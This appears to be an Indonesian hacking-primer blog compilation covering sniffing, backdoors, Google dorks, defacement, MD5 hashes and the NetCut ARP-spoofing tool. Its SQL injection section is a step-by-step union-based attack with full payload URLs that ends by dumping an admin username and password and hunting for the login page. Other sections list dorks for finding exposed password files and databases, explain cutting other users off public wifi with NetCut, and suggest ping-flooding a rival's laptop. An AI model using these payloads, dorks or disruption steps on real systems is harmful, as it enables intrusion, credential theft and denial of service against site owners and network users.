Pengertian Sniffing

Jika Anda pemakai komputer yang terhubung pada suatu jaringan / network, misal di kantor atau warnet, maka pengenalan salah satu term dalam dunia hacking, SNIFFING, menjadi sangat penting. Terutama bagi Anda yang suka beraktifitas dengan melibatkan pengisian username dan password, misal aktifitas email, e-banking, maintenance website atau blog, pembelian barang di internet menggunakan credit card, dsb. Apa hubungannya SNIFFING dengan aktifitas pengunaan username dan password ? Mari kita bahas setahap demi setahap :


• Definisi SNIFFING

Saya ambil dari wikipedia Indonesia, : “Sniffer Paket (arti tekstual: pengendus paket — dapat pula diartikan ‘penyadap paket’) yang juga dikenal sebagai Network Analyzers atau Ethernet Sniffer ialah sebuah aplikasi yang dapat melihat lalu lintas data pada jaringan komputer. Dikarenakan data mengalir secara bolak-balik pada jaringan, aplikasi ini menangkap tiap-tiap paket dan terkadang menguraikan isi dari RFC (Request for Comments) atau spesifikasi yang lain. Berdasarkan pada struktur jaringan (seperti hub atau switch), salah satu pihak dapat menyadap keseluruhan atau salah satu dari pembagian lalu lintas dari salah satu mesin di jaringan. Perangkat pengendali jaringan dapat pula diatur oleh aplikasi penyadap untuk bekerja dalam mode campur-aduk (promiscuous mode) untuk “mendengarkan” semuanya (umumnya pada jaringan kabel).”

Definisi singkatnya, SNIFFING, adalah penyadapan terhadap lalu lintas data pada suatu jaringan komputer. Contohnya begini, Anda adalah pemakai komputer yang terhubung dengan suatu jaringan dikantor. Saat Anda mengirimkan email ke teman Anda yang berada diluar kota maka email tersebut akan dikirimkan dari komputer Anda trus melewati jaringan komputer kantor Anda (mungkin melewati server atau gateway internet), trus keluar dari kantor melalui jaringan internet, lalu sampe di inbox email teman Anda. Pada saat email tersebut melalui jaringan komputer kantor Anda itulah aktifitas SNIFFING bisa dilakukan. Oleh siapa ? Bisa oleh administrtor jaringan yang mengendalikan server atau oleh pemakai komputer lain yang terhubung pada jaringan komputer kantor Anda, bisa jadi teman sebelah Anda. Dengan aktifitas SNIFFING ini email Anda bisa di tangkap / dicapture sehingga isinya bisa dibaca oleh orang yang melakukan SNIFFING tadi. Sangat berbahaya bukan ?


• Potensial Bahaya dari SNIFFING

1. Hilangnya privacy
Seperti contoh di atas, jika email Anda bisa ditangkap oleh SNIFFER (orang yang melakukan SNIFFING) maka isi email menjadi tidak lagi bersifat privat / pribadi jika si Sniffer membaca isi email.

2. Tercurinya informasi penting dan rahasia
Password dan username adalah informasi rahasia yang bisa ditangkap oleh Sniffer dengan mudah saat si korban melakukan login di halaman website melalui internet. Jika username dan password tercuri maka dengan mudah si Sniffer mengantinya dengan yang baru kemudian mencuri semua informasi dalam halaman website yang dilindungi dengan password tersebut. Maka dengan begitu si korban hanya bisa gigit jari karena passwordnya telah diubah, sehingga dirinya tidak bisa login, dan isinya telah di acak-acak dan dicuri.


• Cara melakukan SNIFFING

Biasanya SNIFFING ini dilakukan dengan menggunakan sebuah tool atau software Sniffer. Yang terkenal misalnya : CAIN & ABEL, ETHEREAL, TCPDUMP, ETTERCAP, DSNIFF, ETHERPEAK, AIROPEAK dll. Kemuadian apakah jika kita sudah memiliki tools Sniffing tersebut dengan mudah kita bisa melakukan penyadapan lalu lintas data di jaringan komputer ? Jawabannya, TIDAK MUDAH, sebab lalu lintas data yang ada di jaringan komputer bukan seperti yang tertulis di layar komputer korban. Data tersebut bisa jadi telah di encript atau di acak, sehingga perlu diterjemahkan terlebih dahulu. Mengenai cara lebih detail cara melakukan Sniffing ini, silahkan baca buku atua searching di internet, karena saya belum mempuyai kapasitas untuk mejelaskannya.


• Mencegah SNIFFING

Hal ini mungkin yang terpenting dari artikel SNIFFING ini. Cara mencegah SNIFFING ini hampir tidak ada. Apakah pengunakan Antivirus yang original dan uptodate bisa mencegahnya ? TIDAK. Apakah penggunakan Firewall bisa mencegahnya ? TIDAK. Mengapa tidak ? Sebab SNIFFING dilakukan pada saat data sudah keluar dari komputer korban dan berada dijaringan komputer, sehingga si Sniffer tidak menyerang secara langsung ke komputer korban. Lalu bagaimana cara pencegahan SNIFFING ini ? Caranya adalah dengan tidak melakukan aktifitas yang sifatnya rahasia (misal, email, e-banking, chatting rahasia dll) pada suatu jaringan komputer yang belum Anda kenal, misanya warnet atau kantor yang memilii komputer yang sangat banyak yang dihubungkan dalam suatu jaringan. Anda harus mengenal orang-orang yang memegang komputer dalam jaringan tersebut. Kenalilah dengan baik apakah mereka pengguna komputer biasa atau pengguna komputer yang memiliki pengetahuan hacking. Gampangnya bila Anda berada pada suatu jaringan komputer yang belum dikenal, jadilah orang yang paranoid atau sangat berhati-hati dalam beraktifitas di dunia internet.



Pengertian SQL injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.



===========
= Step Satu:  =
===========

carilah target
misalkan: http//www.snipp55.com/berita.php?id=100

Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
contoh:
http//www.snipp55.com/berita.php?id=100′ atau
http//www.snipp55.com/berita.php?id=-100
sehingga muncul pesan error seperti berikut :

”Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92“

(dan masih banyak lagi pesan error yg lainnya)


==========
= Step Dua: =
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
http//www.snipp55.com/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

http//www.snipp55.com/berita.php?id=-100+order+by+1–
http//www.snipp55.com/berita.php?id=-100+order+by+2–
http//www.snipp55.com/berita.php?id=-100+order+by+3–
http//www.snipp55.com/berita.php?id=-100+order+by+4– dst

sehingga muncul pesan error…
misal pesan errornya muncul di table 9 :

http//www.snipp55.com/berita.php?id=-100+order+by+9–

berarti table yang terdapat dalam database adalah 8
menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–


===========
= Step Tiga:   =
===========

mencari nomor keberuntungan dengan menggunakan perintah union select
karena tadi tablenya hanya ada 8
maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar adalah angka 5

maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai, masukan perintah tsb pada angka yg keluar tadi
misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema

jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema


============
= Step Empat:=
============

menampilkan table yg ada pada web tsb dengan
perintah group_concat(table_name) >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()–>>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+ information_schema.tables+where+table_schema=database()–

ibaratkan yang muncul adalah table  “admin”


===========
= Step Lima:=
===========

menampilkan kolom yang terdapat di table “admin”

perintah group_concat(column_name) >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.columns+where+table_name=Oxhexa–>>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+ information_schema.columns+where+table_name=Oxhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://home2.paulschou.net/tools/xlate/

contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e

maka http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6, 7,8+from+information_schema.columns+where+table_name=Ox61646D696E–

ibaratkan yang muncul adalah column username,password,email


============
= Step Enam : =
============

memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara

perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan) >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a, column yang akan dilihat isinya),6,7,8+from+(nama table)–

contoh column yang keluar td adalah column username,password,email

Maka :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a, email),6,7,8+from+admin–

contoh yang keluar :

admin:an4kal4y:alay_alay@alay.com

cara membaca nya seperti berikut :

username : admin

password : an4kal4y

email : alay_alay@alay.com


==============
= Step Tujuh    :   =
==============

tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).

website yang menyediakan program pencarian login admin :
http://revtan.site40.net/admin/?

Selamat Mencoba

“saya tidak bertanggung jawab bila ada yang menyalahgunaan informasi yang ada di blog ini”

“anda yang berbuat,anda yang menerima”     ^_^

(Sumber)


Pasti anda bertanya tanya apa itu Backdoor. Sebuah backdoor dalam sistem komputer (atau cryptosystem atau algoritma) adalah sebuah metode untuk melewati otentikasi normal, mengamankan akses jarak jauh ke komputer, mendapatkan akses ke plaintext, dan sebagainya, ketika mencoba untuk tetap tidak terdeteksi. Backdoor ini bisa mengambil bentuk program yang diinstal (misalnya, Back Orifice) atau dapat menumbangkan sistem melalui rootkit.

Ancaman backdoors muncul ketika sistem operasi multiuser dan jaringan menjadi diadopsi secara luas. Petersen dan Turn dibahas subversi komputer dalam sebuah makalah yang diterbitkan dalam prosiding Konferensi AFIPS 1967 . Mereka mencatat kelas serangan infiltrasi aktif yang menggunakan "pintu jebakan" titik masuk ke dalam sistem untuk melewati fasilitas keamanan dan ijin akses langsung ke data . Penggunaan pintu jebakan kata di sini jelas bertepatan dengan definisi yang lebih baru dari backdoor. Namun, sejak kedatangan dari kriptografi kunci publik pintu jebakan istilah telah memperoleh arti yang berbeda. Secara umum, pelanggaran keamanan tersebut dibahas panjang lebar dalam sebuah laporan tugas RAND Corporation force diterbitkan di bawah sponsor ARPA oleh JP Anderson dan DJ Edwards tahun 1970.

Sebuah backdoor dalam sistem login mungkin mengambil bentuk kode pengguna keras dan kombinasi sandi yang memberikan akses ke sistem. Sebuah contoh yang terkenal semacam ini backdoor adalah sebagai perangkat plot di tahun 1983 WarGames film, di mana arsitek dari sistem "WOPR" komputer telah memasukkan sandi hardcoded (nama anaknya yang telah tiada) yang memberikan akses pengguna ke sistem, dan untuk bagian yang tak tercatat dari sistem (khususnya, mode simulasi video game seperti dan interaksi langsung dengan kecerdasan buatan).

Sebuah usaha untuk menanam backdoor di kernel Linux, terpapar pada November 2003, menunjukkan bagaimana halus seperti perubahan kode dapat  Dalam hal ini, perubahan dua baris tampak kesalahan ketik,. Tetapi sebenarnya memberikan penelpon dengan akses sys_wait4 fungsi root untuk sistem. Meskipun jumlah backdoors dalam sistem yang menggunakan perangkat lunak berpemilik (perangkat lunak yang kode sumbernya tidak tersedia untuk umum) tidak banyak dikreditkan, mereka tetap sering terkena. Pemrogram bahkan berhasil diam-diam menginstal jumlah besar kode jinak sebagai telur Paskah dalam program-program, meskipun kasus tersebut dapat melibatkan kesabaran resmi, jika tidak izin sebenarnya.

Hal ini juga memungkinkan untuk membuat backdoor tanpa memodifikasi kode sumber dari program, atau bahkan memodifikasi setelah kompilasi. Hal ini dapat dilakukan dengan menulis ulang compiler sehingga kode mengakui selama kompilasi yang memicu masuknya backdoor dalam output terkompilasi. Ketika compiler dikompromikan menemukan kode seperti itu, mengkompilasi itu seperti biasa, tetapi juga menyisipkan backdoor (mungkin rutin pengakuan password). Jadi, ketika pengguna memberikan masukan itu, ia memperoleh akses ke beberapa aspek (mungkin tidak tercatat) operasi program. Serangan ini pertama kali digariskan oleh Ken Thompson dalam Refleksi terkenal kertas pada Mempercayai Trust (lihat di bawah).

Banyak worm komputer, seperti Sobig dan Mydoom (dan Skynet terselubung), menginstal backdoor pada komputer yang terkena (biasanya PC pada broadband menjalankan versi tidak aman dari Microsoft Windows dan Microsoft Outlook). backdoors tersebut tampaknya dipasang sehingga spammer dapat mengirim junk e-mail dari mesin yang terinfeksi. Lainnya, seperti Sony / BMG rootkit didistribusikan diam-diam di jutaan CD musik melalui akhir tahun 2005, dimaksudkan sebagai tindakan DRM - dan, dalam kasus itu, sebagai data pengumpulan agen, karena kedua program sembunyi-sembunyi mereka memasang rutin dihubungi server pusat.

Sebuah backdoor tradisional adalah sebuah backdoor simetris: siapa pun yang menemukan backdoor pada gilirannya dapat menggunakannya. Gagasan dari sebuah backdoor asimetris diperkenalkan oleh Adam Young dan Moti Yung di Proceedings dari Uang Muka pada Kriptologi: Crypto '96. Sebuah backdoor asimetris hanya dapat digunakan oleh penyerang yang menanam itu, bahkan jika implementasi penuh backdoor menjadi publik (misalnya, melalui penerbitan, yang ditemukan dan diungkapkan oleh reverse engineering, dll). Juga, adalah komputasi terselesaikan untuk mendeteksi keberadaan sebuah backdoor asimetris bawah query kotak hitam. Serangan kelas ini telah disebut kleptography, mereka dapat dilakukan di perangkat lunak, perangkat keras (misalnya, Smartcard), atau kombinasi dari keduanya. Teori backdoors asimetris adalah bagian dari bidang yang lebih besar sekarang disebut cryptovirology.

Terdapat sebuah backdoor asimetris RSA eksperimental dalam pembangkitan kunci. Ini OpenSSL RSA backdoor dirancang oleh Young dan Yung, menggunakan twisted pair kurva eliptik, dan telah tersedia.
Refleksi Ken Thompson pada Mempercayai Trust adalah kertas besar pertama untuk menjelaskan masalah kotak hitam backdoor, dan menunjukkan bahwa kepercayaan adalah relatif. Ini menggambarkan mekanisme backdoor sangat pandai didasarkan pada kenyataan bahwa orang hanya mengulas sumber (manusia-tertulis) kode, dan kode mesin tidak dikompilasi. program yang disebut compiler yang digunakan untuk membuat kedua dari yang pertama, dan kompilator biasanya dipercaya untuk melakukan pekerjaan yang jujur.
kertas Thompson menggambarkan versi modifikasi dari kompiler C Unix yang akan:

* Pasang sebuah backdoor tak terlihat dalam perintah login Unix ketika melihat bahwa program login sedang disusun, dan sebagai twist
* Juga menambahkan fitur ini undetectably untuk versi compiler pada saat kompilasi masa depan mereka juga.

Karena compiler itu sendiri adalah sebuah program yang dikompilasi, pengguna akan sangat tidak mungkin untuk melihat instruksi kode mesin yang melakukan tugas ini. (Karena tugas kedua, kode sumber compiler akan muncul "bersih".) Yang lebih parah lagi, dalam bukti Thompson implementasi konsep, compiler ditumbangkan juga ditumbangkan program analisis (disablembler tersebut), sehingga siapa pun yang diperiksa binari di dalam cara biasa tidak akan benar-benar melihat kode yang sebenarnya yang sedang dijalankan, tetapi sesuatu yang lain sebagai gantinya. Versi ini, secara resmi, tidak pernah dilepaskan ke alam liar. Hal ini diyakini, bagaimanapun, bahwa sebuah versi didistribusikan ke BBN dan setidaknya satu penggunaan backdoor dicatat. Serangan ini baru-baru ini (Agustus 2009) ditemukan oleh laboratorium Sophos: Virus W32/Induc-A terinfeksi compiler program untuk Delphi, bahasa pemrograman Windows. Virus ini memperkenalkan kode sendiri untuk penyusunan program Delphi baru, yang memungkinkan untuk menginfeksi dan merambat ke banyak sistem, tanpa sepengetahuan programmer perangkat lunak. Sebuah serangan yang menyebar dengan membangun sendiri Trojan Horse dapat sangat sulit untuk menemukan. Hal ini diyakini bahwa Induc-virus telah menyebarkan setidaknya satu tahun sebelum ditemukan. Setelah sistem telah berkompromi dengan kuda backdoor atau Trojan, seperti compiler Trust Mempercayai, sangat sulit bagi pengguna "berhak" untuk mendapatkan kembali kontrol sistem. Namun, beberapa kelemahan praktis skema Trust Mempercayai telah diusulkan. Sebagai contoh, pengguna cukup termotivasi dengan susah payah bisa memeriksa kode mesin dari kompiler untrusted sebelum menggunakannya. Sebagaimana disebutkan di atas, ada beberapa cara untuk menyembunyikan kuda trojan, seperti menumbangkan disablembler itu, tapi ada cara untuk melawan pertahanan itu juga, seperti menulis disablembler Anda sendiri dari awal, sehingga compiler yang terinfeksi tidak akan mengenalinya. Namun, proposal tersebut umumnya tidak praktis. Jika pengguna memiliki perhatian serius yang kompilator dikompromikan, mereka akan lebih baik menghindari menggunakan sama sekali daripada mengkaji biner secara rinci hanya menggunakan alat-alat yang telah diverifikasi untuk menjadi murni. Seorang pengguna yang tidak memiliki keprihatinan serius bahwa kompiler itu tidak bisa dikompromikan secara praktis diharapkan untuk melakukan sejumlah besar pekerjaan yang dibutuhkan.

David A. Wheeler telah mengajukan kontra serangan ini dengan menggunakan pendekatan yang ia sebut "beragam double-compiling", yang menggunakan teknik diadaptasi dari bootstrap compiler. Ini melibatkan kompilasi ulang sumber kompilator melalui compiler lain yang ditulis secara independen dan dihasilkan "terpercaya", dan kemudian menggunakan biner yang dihasilkan dari ini untuk mengkompilasi ulang compiler asli lagi, dan kemudian membandingkan biner yang dihasilkan dari kompilasi kedua dengan yang dihasilkan menggunakan compiler asli untuk mengkompilasi ulang sendiri secara langsung. 



Dalam dunia hacker istilah Google Dork sering di jumpai. Google Dork adalah seni hacking yang memanfaatkan kehandalan atau kecanggihan sebuah mesin pencari (Search Engines) seperti Google. Bagi pemula penggunaan google memang sangat membantu dalam belajar hacking.Google sendiri sebenarnya juga jengkel yang memanfaatkan fasilitas mesin pencarianya untuk mencari kelemahan sebuah website. Hingga google menyebut Dork (bisa berarti malas) bagi orang yang melakukan hal itu.

Google Dorks bisa dikatakan sebagai pusat Hacking Google. Banyak hacker menggunakan google untuk mencari halaman web yang rentan dan kemudian menggunakan kerentanan itu untuk melakukan hacking. Jadi hacker tersebut tidak menentukan website target, tetapi hanya mencari website yang mempunyai kerentanan dalam pengamanannya.

Sebenarnya google tidak mempunyai tujuan untuk membeberkan kelemahan sebuah website. Tetapi tidak lebih dari mempermudah user dalam mencari informasi yang tersebar di dunia maya.  Banyak pencarian yang terkadang yang tidak sesuai dengan keyword yang kita tulis, hal ini di sebabkan karena keyword yang di tulis pada google tidak sesuai dengan keyword yang terdaftar. Sehingga untuk mempermudahnya Google menyediakan fasilitas, untuk mempermudah suatu pencarian, bahkan kita bisa melakukan hacking untuk melihat suatu passoword dan account yang terindex oleh google.


Berikut beberapa tipe dork :

1. untuk mencari judul/title pada suatu web
- intitle
- allinitle

2. mencari string yang terdapat pada url
- inurl
- allinurl

3. Mencari file yang lebih spesifik
- filetype

4. Mencari suatu nilai string dalam suatu website
- allintext

5. Mencari pada suatu website tertentu
- site

6. Mencari website yang mempunyai link pada web di pilih
- link

Beberapa kode tambahan dalam pencarian akan sangat membantu, agar pencarian anda semakin fokus. Jadi sebenarnya kita hanya akan memfokuskan pencarian dalam sistem database google itu sendiri. Beberapa contoh penggunaan Google Dork untuk tujuan mencari sebuah password dan username :

inurl:password.log
intitle:"index of" password.txt site:my
intitle:index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"

Dari situlah beberapa hacker sedikit modifikasi dalam pencaraian kerentanan sistem website. Dan list Dork yang beredar pun  jumlahnya cukup banyak. Samapai sekarang Dork yang ditampilakan pun bervariasi, mulai dari website berbasis Joomla, PHP, SQL, ASP, RF1 dan LF1. Dengan begitu banyak hacker menggunakan google untuk mencari halaman web yang rentan dan kemudian menggunakan kerentanan untuk hacking.


Contoh Dorks :

1. Direktori CGI mengandung script yang sering dapat dieksploitasi oleh penyerang. "index pf sgi-bin" dengan cara ini anda akan menemukan direktori CGI banyak beberapa dari mereka yang mungkin rentan.
2. Google Dork lain yang terkenal adalah Dork PhpMyAdmin. PhpMyAdmin adalah webfronted widly menyebar digunakan untuk mantain database aql. Mekanisme keamanan default adalah menyerahkannya ke admin website untuk menempatkan file. Htaccess di direktori aplikasi.

Mungkin hanya sepintas itu yang saya berani ungkapkan kepada anda tentang Google Dork. Silahkan jika ingin belajar lakukan lah beberapa modifikasi tambahan dan jangan lupa mainkan logika anda. Bagi admin website sebaiknya anda berhati-hati jika tidak ingin website anda di buat bahan percobaan oleh para hacker pemula.  Terima Kasih Semoga Bermanfaat


Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama  atau index filenya ataupun halaman lain yang masih terkait dalam satu  url dengan website tersebut (bisa di folder atau di file).

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.

(Sumber)

Pengertian MD5 (Message-Digest algortihm 5) adalah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit (sumber: wikipedia).

Password MD5 merupakan salah satu perlindungan kepada user dalam menggunakan fasilitas internet di dunia maya, terutama yang berhubungan dengan password, karena sebuah password adalah kunci yang sangat berharga bagi kita yang sering melakukan aktifitas di dunia maya.

Bisa kita bayangkan apabila seorang cracker mampu menjebol database website misalnya situs pemerintah yang sifatnya sangat rahasia kemudian cracker tersebut mencari bug dari situs targetnya dengan berbagai macam metode/teknik hacking (seperti : SQL Injection, Keylogger, Social Engineering, Trojan Horse, DDOS d.l.l)

Cracker bisa menembus ke database dan mendapatkan password korbannya dalam bentuk hash, dan kalau berhasil mencuri passwordnya dalam bentuk hash yang totalnya berjumlah 32bit (contoh hash : fdf0ef0ea5c1620f77107f3f1047fb4c) maka dengan mudah password hash hasil encrypt MD5 tersebut tinggal di decrypt ke dalam bentuk plain text (teks biasa) dengan menggunakan tools/software yang bisa didownload gratis dari paman google maupun website penyedia layanan decrypt password hash MD5 ke password yang sebenarnya.

Dengan demikian secara otomatis sang cracker pun dengan leluasa melakukan semua  hal yang dia inginkan seperti mencuri data, merubah data, mengganti tampilan suatu website (Deface) dan bahkan ada yang hanya mendiamkannya saja karena maksud utamanya adalah untuk mengetes security dari situs targetnya saja dan untuk memenuhi rasa penasarannya sampai dia bisa menembus database nya dan tidak berniat untuk merusak, setelah bisa ditembus databasenya ditinggalkan begitu saja , biasanya hal tersebut dilakukan oleh seorang hacker golongan putih (WhiteHat).

Sejarah singkat MD5 di mulai pada tahun 1991 yang didesain oleh Prof. Ronald Rivest  dari universitas di Amerika Serikat yaitu MIT, Prof. Ronald Rivest mendesain MD5 karena telah ditemukan kelemahan pada MD4 yang ditemukan Hans Dobbertin. Pada Tahun 1996 Hans Dobbertin menemukan sebuah kerusakan/celah pada fungsi kompresi MD5, namun hal ini bukanlah serangan terhadap hash MD5 sepenuhnya, sehingga dia mengumumkan untuk para pengguna kriptografi menganjurkan supaya mengganti dengan WHIRLPOOL, SHA-1, atau RIPEMD-160.

Namun lambat laun MD5 sudah tidak bisa diandalkan lagi karena hash hasil encrypt MD5 mulai menampakkan kerusakannya dan sudah diketahui rahasia algoritma  pada MD5, hal tersebut ditemukan kerusakannya pada tanggal 17 Agustus 2004 oleh Xiaoyun Wang, Dengguo Feng, Xuejia Lay dan Hongbo Yu, kalau dilihat dari namanya mereka berasal dari negri tirai bambu China,  sekedar info saja bahwa serangan yang mereka lakukan untuk bisa men-decrypt hash MD5 ke plain text hanya membutuhkan waktu satu jam saja, dengan menggunakan IBM P690 cluster.



Netcut - Semua orang sudah keringatan dan manyun di sebuah hostspot wifi umum gratisan akibat koneksi yang putus tiba tiba, tapi anda melihat satu orang yang masih segar bugar dengan wajah yang tak bergelimang berdosa. Maka si kawan itu wajib dicurgai apakah dia sedang memakai netcut untuk mencuri kuota internet anda/ usil dengan user lainnya.


Sekilas cara kerja netcut :
  1. NetCut menjadikan laptop/komputernya sebagai gateway. Jadi dia bebas mengatur siapa yang masuk, dan siapa yang perlu ditendang keluar.
  2. Bekerja berdasarkan ARP (Address Resolution Protocol) Spoofing.Jadi dia mengelabui mac adress komputer satu Dengan IP adress Komputer lain.Misal, komputer A mau komunikasi ke B. Tapi, tiba2 si C mengganggu komunikasi. Karena sebelumnya si C sudah sukses melakukan penyusupan di bagian ARP. Jadi si C bisa suka aja mau diapain tuh data yang sudah di copet. Mau di putus, di sambung semua terserah padanya.
  3. Software netcut ini paling popular di kalangan pengguna internet wifi gratisan.
  4. Software ini buat sakit hati.

Cara menggunakan Netcut :
  1. Penggunaan netcut sangat mudah dan simpel.
  2. Download netcut  > install di komputer > Jalankan softwarenya.
  3. Tinggal pilih IP/Hostname/Mac Address client yang ingin diputuskan koneksinya dan mengklik cut off.
  4. User tersebut akan langsung terputus koneksinya dari server sampai anda membebaskannya atau dengan mengklik Resume atau dia mengganti IP address nya sendiri.




Cara atasi netcut :
  1. Kalau kawan merasa sudah diusili seseorang, pertama ganti saja dulu IP adress nya untuk menghindar, kalau boleh ubah kedekat dengan IP Server atau gateway untuk mengelabuhinya. Kalau dia tetap berulah. Telepon semua pasukan geng anda. :)
  2. Cek ARP untuk mengetahui apakah ada orang yang memakai netcut.
  3. Start menu > run > ketik "cmd" atau command prompt > ketik lagi "arp -a" untuk melihat IP router. Kalau ada lebih dari satu ip router, pertimbangkan niat ber online. Atau lapor saja ke admin tentang hal ini. Lebih gampang : kawan bisa install program Anti ARP (sayang masih trial version, belum ketemu keygennya) dan jalankan sebelum online. Biar lebih aman.
  4. Hidden komputer dari LAN pake XP antispy
  5. Bisa juga memakai program seperti "Anti Netcut", namun saya belum yakin apakah akan bekerja.
  6. Kerjai balik si Pembuat ulah. Banjiri laptopnya dengan ping yang bejibun dan terus menerus. Biar cepat hang sekalian terutama jika RAM nya rendah. Amin..
  7. start menu > run > ketik "cmd" >> ketik lagi "ping google.com -t"
  8. Lihat muka yang paling tidak berdosa ketika anda baru saja kehilangan koneksi. Razia laptop/ komputernya. Kalau ketahuan, pertimbangkan langkah 1 diatas.
  9. Yang teraman memang, jangan menggunakan software netcut ini untuk mengusili orang, apalagi misalnya korban sedang serius mengerjakan tugas penting. Kasian. Kalau buat sebatas bercanda mungkin boleh sesekali.

Demikian lah penjelasan singkat mengenai cara kerja netcut dan cara mencegah netcut nya. Intinya dari software ini: Gunakan sesuai kondisi.